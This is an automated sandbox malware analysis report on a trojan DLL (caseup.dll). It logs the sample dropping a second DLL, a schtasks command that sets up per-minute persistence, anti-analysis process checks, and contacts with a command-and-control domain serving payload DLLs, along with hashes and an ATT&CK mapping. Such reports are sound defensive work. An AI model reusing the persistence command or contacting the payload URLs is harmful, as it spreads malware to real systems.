Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002CD50	9_2_000000018002CD50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180070BE0	9_2_0000000180070BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180083D70	9_2_0000000180083D70
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CCE10	9_2_00000001800CCE10
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018000EE3F	9_2_000000018000EE3F
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180008E4F	9_2_0000000180008E4F
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180072F10	9_2_0000000180072F10
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180031F40	9_2_0000000180031F40
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180028F50	9_2_0000000180028F50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180079F90	9_2_0000000180079F90
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CCFC0	9_2_00000001800CCFC0

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF2F87900 appears 47 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF2F2223B appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF2EE4A70 appears 39 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00000001800E4BE0 appears 58 times
Source: C:\Windows\System32\loaddll64.exe	Code function: String function: 000007FEF3054520 appears 39 times
Source: C:\Windows\System32\loaddll64.exe	Code function: String function: 000007FEF30FE240 appears 61 times
Source: C:\Windows\System32\loaddll64.exe	Code function: String function: 000007FEF307566C appears 47 times

Source: caseup.dll	ReversingLabs: Detection: 28%
Source: caseup.dll	Virustotal: Detection: 25%

Source: caseup.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\caseup.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {195B2CF0-9BCC-4145-91B3-37920C07B877} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\ZLoad-Soft-Mutex M *

Source: classification engine

Classification label: mal80.troj.evad.winDLL@18/1@6/1

Source: C:\Windows\System32\loaddll64.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: caseup.dll

Static file information: File size 1453568 > 1048576

Source: caseup.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: caseup.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: caseup.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: caseup.dll	Static PE information: section name: _RDATA
Source: UimbTD.dll.5.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\rundll32.exe

File created: C:\ProgramData\StndUpdate\UimbTD.dll

Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

File created: C:\ProgramData\StndUpdate\UimbTD.dll

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49174

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\System32\loaddll64.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Windows\System32\taskeng.exe TID: 1696

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

API coverage: 9.6 %

Source: rundll32.exe, 00000009.00000002.1412198492.0000000000362000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,fiddler.exe,vmware.exe,Virt
Source: rundll32.exe, 00000009.00000002.1412198492.0000000000362000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: API response successfully received,fiddler.exe,vmware.exe,Virt

Source: C:\Windows\System32\rundll32.exe

Code function: 9_2_000000018001C05A LoadLibraryA,PathFileExistsA,IsDebuggerPresent,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,

9_2_000000018001C05A

Source: C:\Windows\System32\loaddll64.exe

Code function: 1_2_000007FEF305A570 GetProcessHeap,HeapAlloc,

1_2_000007FEF305A570

Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30F1978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_000007FEF30F1978
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F7B208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_000007FEF2F7B208
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800D7870 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00000001800D7870

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 206.81.11.20 80			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: it-south-bridge.com

Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 1_2_000007FEF30F1380 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_000007FEF30F1380

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	111 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	12 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	3 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
caseup.dll	28%	ReversingLabs	Win64.Trojan.Generic
caseup.dll	26%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\StndUpdate\UimbTD.dll	22%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\StndUpdate\UimbTD.dll	9%	Metadefender		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
it-south-bridge.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://it-south-bridge.com/	0%	Avira URL Cloud	safe
http://it-south-bridge.com:81/new_style/UimbTD.dll=Q&	0%	Avira URL Cloud	safe
http://it-south-bridge.com:81/new_style/UimbTD.dll.X	0%	Avira URL Cloud	safe
http://it-south-bridge.com/XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ	0%	Avira URL Cloud	safe
http://it-south-bridge.com:81/new_style/UimbTD.dll.	0%	Avira URL Cloud	safe
http://it-south-bridge.com/8	0%	Avira URL Cloud	safe
http://it-south-bridge.com/XbnZ/XmznAcQ	0%	Avira URL Cloud	safe
http://it-south-bridge.com:81/new_style/xMbdNh.dll	0%	Avira URL Cloud	safe
http://it-south-bridge.com:81/new_style/UimbTD.dll	0%	Avira URL Cloud	safe
http://it-south-bridge.com/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
it-south-bridge.com	206.81.11.20	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://it-south-bridge.com/XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ	true	Avira URL Cloud: safe	unknown
http://it-south-bridge.com:81/new_style/xMbdNh.dll	true	Avira URL Cloud: safe	unknown
http://it-south-bridge.com:81/new_style/UimbTD.dll	true	Avira URL Cloud: safe	unknown
http://it-south-bridge.com/XbnZ/XmznAcQ	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://it-south-bridge.com:81/new_style/UimbTD.dll.X	rundll32.exe, 00000004.00000002.896065085.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://it-south-bridge.com:81/new_style/UimbTD.dll=Q&	loaddll64.exe, 00000001.00000002.915088706.0000000000338000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://it-south-bridge.com/	rundll32.exe, 00000009.00000002.1412209832.0000000000369000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://it-south-bridge.com:81/new_style/UimbTD.dll.	rundll32.exe, 00000004.00000002.896065085.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://it-south-bridge.com/8	rundll32.exe, 00000009.00000002.1412209832.0000000000369000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
206.81.11.20	it-south-bridge.com	United States		14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	742971
Start date and time:	2022-11-10 11:42:21 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	caseup.exe (renamed file extension from exe to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@18/1@6/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 11.2% (good quality ratio 9.6%) Quality average: 69.4% Quality standard deviation: 36.4%
HCA Information:	Successful, ratio: 64% Number of executed functions: 26 Number of non-executed functions: 108
Cookbook Comments:	Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:42:13	API Interceptor	54x Sleep call for process: rundll32.exe modified
11:42:16	API Interceptor	1x Sleep call for process: loaddll64.exe modified
11:42:19	API Interceptor	2x Sleep call for process: schtasks.exe modified
11:42:20	API Interceptor	210x Sleep call for process: taskeng.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	Nepla#U0107eno pla#U0107anje.tar	Get hash	malicious	Browse	178.128.107.142
	00000000.exe	Get hash	malicious	Browse	178.128.107.142
	0F9qutPpOT.elf	Get hash	malicious	Browse	134.209.202.129
	Mu3hV1GZud.elf	Get hash	malicious	Browse	161.35.133.193
	GUZyjs3wxI.dll	Get hash	malicious	Browse	209.97.163.214
	deJZhguRIN.dll	Get hash	malicious	Browse	64.227.55.231
	LHC8933UcF.dll	Get hash	malicious	Browse	64.227.55.231
	GUZyjs3wxI.dll	Get hash	malicious	Browse	209.97.163.214
	LHC8933UcF.dll	Get hash	malicious	Browse	64.227.55.231
	deJZhguRIN.dll	Get hash	malicious	Browse	64.227.55.231
	file.dll	Get hash	malicious	Browse	64.227.55.231
	file.dll	Get hash	malicious	Browse	64.227.55.231
	file.dll	Get hash	malicious	Browse	64.227.55.231
	file.dll	Get hash	malicious	Browse	64.227.55.231
	file.dll	Get hash	malicious	Browse	64.227.55.231
	T6bFrwkDuq.exe	Get hash	malicious	Browse	178.62.98.218
	09112022.xls	Get hash	malicious	Browse	64.227.55.231
	Y9MEC0LE6e.dll	Get hash	malicious	Browse	64.227.55.231
	Y9MEC0LE6e.dll	Get hash	malicious	Browse	64.227.55.231
	templates624.png.dll	Get hash	malicious	Browse	167.172.39.160

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\StndUpdate\UimbTD.dll

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1429504
Entropy (8bit):	6.699057205598926
Encrypted:	false
SSDEEP:	24576:rDFnfBnBa1edoSjD7Qn652oOtl9TmcdljVIH06iy:rlBnB0ed5jDeuQ1dXIU6i
MD5:	2707B53E639FC85C1CE86C924CDAF27A
SHA1:	7D044915D21FA973489FC6BA9FF1BEA6B90A5940
SHA-256:	B0620F36F136D0C8E4C036A67798DE2902BBD45BD21BD026102D53285D56622C
SHA-512:	47EF0917C0CCF587486AB450877230DC08884A26D018E1284B163352BB4170A765D9BC3C754BF056DADBD2B7A392F819145E582BFEE39E354572D96A3993FC91
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 22% Antivirus: Metadefender, Detection: 9%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:...>...:...9...:...?...:...?...:...>...:...9...:...;.h.:...;...:...>...:...:...:...:...:......:...8...:.Rich..:.................PE..d...b.jc.........." ...!.....V...... ........................................0............`.........................................pM..H....M..d................W..................0...........................(.......@...............x............................text.............................. ..`.rdata..............................@..@.data....!...`.......F..............@....pdata...W.......X...V..............@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	6.696004207534635
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	caseup.dll
File size:	1453568
MD5:	b32f33fb26ea59675dc95563fd68b4bc
SHA1:	c78615f0775cd411c42afa37c1ab57bfaf9cb398
SHA256:	daa78ec9ac5ba2efffe8ee414c348e2eafa787e341dea0ac83f602b56520fa75
SHA512:	a8f79dbe99224e5029781757382516bde4d1065ae14020526435919a0289e235c5b39316fa2947f53d7aae47ca9d8e8d743b53ae5d39c20b39ca03df584bf6d2
SSDEEP:	24576:wfu1DLzZRfLIS8dApvQn652/3OJp9TmcyljVIH06iy:wfu1lRfLIS8doypQ1yXIU6i
TLSH:	6B658C07F59049A9C46AC27882479732B732BC490B25BBEF27D0B6703D62BD06E2D75D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}.......}.......}......%}.. ....}.. ....}.. ....}..!....}.......}...}...}.......}...}...}.......}....s..}.......}.

File Icon


Icon Hash:	3074e4d6ded4d0e4

Static PE Info

General

Entrypoint:	0x1800b1290
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x636A1534 [Tue Nov 8 08:37:08 2022 UTC]
TLS Callbacks:	0x80056b70, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f4ac0cb963dc34b5f24668996ece841f

Entrypoint Preview

Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007F5944EE9557h
call 00007F5944EE9624h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007F5944EE93E4h
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F5944EE9562h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F5944EE9565h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F5944EE955Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F5944EE956Ah
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x15ae50	0x48	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15ae98	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x165000	0x380	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x15f000	0x4c74	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x166000	0x19d0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x155630	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x155680	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1554f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc1000	0x378	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

